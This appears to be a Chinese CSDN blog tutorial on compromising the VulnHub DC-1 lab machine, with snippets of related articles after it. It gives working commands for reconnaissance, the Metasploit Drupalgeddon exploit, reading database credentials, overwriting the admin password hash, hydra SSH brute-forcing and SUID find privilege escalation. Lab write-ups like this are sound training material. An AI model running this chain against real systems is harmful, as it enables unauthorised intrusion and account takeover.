DC系列:1 (DC-1靶机,初级渗透详细教程)

最新推荐文章于 2024-06-09 23:38:41 发布
最新推荐文章于 2024-06-09 23:38:41 发布
阅读量7.4k 收藏 60
点赞数 11
分类专栏: kali 漏洞复现 文章标签: web安全 ssh 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/121610817
版权

DC-1靶机渗透

find提权详解
find详解.

环境搭建

详情

名称DC- 1
发布日期2019年2月28日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-1,292/

描述

DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。

它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。

要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot
Security OS上找到的工具。

有多种方法可以获得根,但是,我包含了一些包含初学者线索的标志。

总共有五个标志,但最终目标是在root的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root
用户权限。

根据您的技能水平,您可以跳过查找这些标志中的大多数,直接找到root。

初学者可能会遇到他们以前从未遇到过的挑战,但是Google搜索应该是获取完成此挑战所需的信息所需的全部内容。

使用工具

攻击者:kali 192.168.10.153
靶机:dc-1 192.168.10.157

一:信息收集

基础信息查询

0x01 查看存活主机

arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探

在这里插入图片描述

0x02 查看开放端口

masscan --rate=10000 --ports 0-65535 192.168.10.157

在这里插入图片描述

0x03 查看端口服务

nmap -sV -T4 -O -p 80,111,22 192.168.10.157

在这里插入图片描述

查询发现,目标靶机开放ssh远程连接服务,HTTP服务,rpcbind服务(此服务可用利用,形成资源占用攻击,这里用处不大但要知道)

0x04 扫描网站根目录及指纹信息

whatweb http://192.168.10.157 扫描网站指纹信息

在这里插入图片描述
可以发现,目标靶机的CMS建站系统为Drupal 7 可以尝试查看对应的版本漏洞

dirb http://192.168.10.157 /usr/share/dirb/wordlists/big,txt

在这里插入图片描述

0x05 访问开放网页

发现一个登录窗口,尝试SQL注入失败,尝试其他方法
在这里插入图片描述

二:漏洞发现

msf漏洞查询

0x01 启动msf

msfconsole
search Drupal 7

在这里插入图片描述
一个个尝试着使用(Rank 为excellent的成功概率大一点,比较好用)

use auxiliary/gather/drupal_openid_xxe
set lhost 192.168.10.157
set Rhosts 192.168.10.157
show options 
run

在这里插入图片描述
第一个漏洞失败,经尝试发现,exploit/multi/http/drupal_drupageddon
这个漏洞可以利用成功
在这里插入图片描述
在这里插入图片描述
shell 后,python -c 'import pty;pty.spawn("/bin/bash")'开启终端
在这里插入图片描述

0x02 flag1

可以在/var/www 目录下查找到flag1
在这里插入图片描述
flag提示我们查看config配置文件,
百度之后发现,Drupal的配置文件(settings.php)在sites/default/files 中
cd到sites/default/中查看

0x03 flag2

查找到MySQL数据库账户及密码,尝试登录查找信息
在这里插入图片描述

0x04 查询数据库信息

mysql -u dbuser -p R0ck3t

在这里插入图片描述
登录成功,查询账号密码

show databases;
use drupaldb
show tables;
select* from users;

在这里插入图片描述
查询到账户密码,这里的密码为密文加密,尝试使用md5解密,发现解密失败

三:漏洞利用

ssh远程连接漏洞

0x01 破解密码加密

法一:
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更为直接。
在这里插入图片描述
查看数据库信息:
在这里插入图片描述
新用户 admin2 admin2创建成功,可以进行登陆

方法二:
drupal可以利用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下
使用加密脚本加密新密码:qwer,生成加密密文,将所得密文替换MySQL数据库中的原有密文,实现密码更新

find -name password_hash* 查找到文件的存在位置

在这里插入图片描述

srcipt/password-hash.sh qwer 将加密结果更新到数据库中,即可登录

在这里插入图片描述

update users set 
password='$S$DIMTIl9Ae8pGs0FNqTaQ06uFIe
/xYadkJCoQJaLaFzLXZej/SAAp'
where uid=1;    更新admin账户的密码,尝试登录

在这里插入图片描述

0x02 flag3

登录查看flag3,提示到 find提权,-exec shadow文件 passwd文件
在这里插入图片描述
查看passwd文件,发现flag4是一个用户
在这里插入图片描述

0x03 爆破flag4用户密码

gzip -d rockyou.tar 解压密码字典
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.157      
尝试爆破flag4的密码

在这里插入图片描述
爆破成功,密码为orange

0x04 ssh远程连接

在这里插入图片描述

0x05 flag4

其实完全不需要ssh远程连接即可查看到flag4(flag4是一个用户,则cd/home/flag4 查看其中有无flag文件,查找到flag4.txt)
在这里插入图片描述

四:提权

根据flag3中提示可以find提权

使用find命令查找有特殊权限suid的命令
在这里插入图片描述
发现find具有su权限,尝试使用find提权

find / -name 233 -exec "/bin/sh" \;

在这里插入图片描述
提权成功,找到flag5,渗透结束

总结

此次渗透,考察ssh爆破,drupal文件配置路径信息,find提权用法等知识点,多多练习,百炼成钢。

jrdh1209
关注
  • 11
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-1靶机教程
qq_42553928的博客
04-07 5228
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
DC-1完整的渗透测试过程
weixin_51097397的博客
06-29 914
1.此次DC-1的渗透用到了如下几种工具的基础使用①namp②whatweb④hydra2.其中用到了python getshell的方法3.数据库的基本使用(增删改查)4.linux的基本命令,尤其是suid提权find的用法} \;这些基本的操作用法我非常不熟,需要经常练习去掌握。!!
DC-1靶机渗透教程以及思路)
菜菜的博客
10-20 2903
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
渗透测试学习之vulnhub系列靶机——DC1
最新发布
jingzhou_666的博客
06-09 1750
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
DC-1靶机渗透学习
里丘~班诺的小屋
08-31 2170
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
靶机DC-1攻略
weixin_43179779的博客
10-07 1127
dc-1靶机靶机攻略
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC系列】DC-1靶机实战详细讲解
weixin_44681307的博客
06-27 172
Dc-1靶机突破方法
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2219
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-1靶场渗透实验
Alashan12的博客
05-05 1919
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1287
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
靶机DC-1 WP
m0_66638011的博客
05-11 1630
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
【Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 419
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
DC-1靶场
2301_76690905的博客
12-01 67
下载后解压成.ova格式,虚拟机上直接打开这个.ova就行,kali和靶机都调成NET模式因为攻击机和靶机同在局域网使用内网扫描:Nmap扫靶机ip:-v:该选项表示在扫描期间显示详细的输出信息,使您能够更好地了解扫描进度和结果。-A:这是一个组合选项,用于启用一系列高级扫描技术和功能,以便获得更全面的目标主机信息。-A 选项将同时启用以下子选项:主机发现(Host Discovery):尝试确定目标 IP 地址是否可达。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值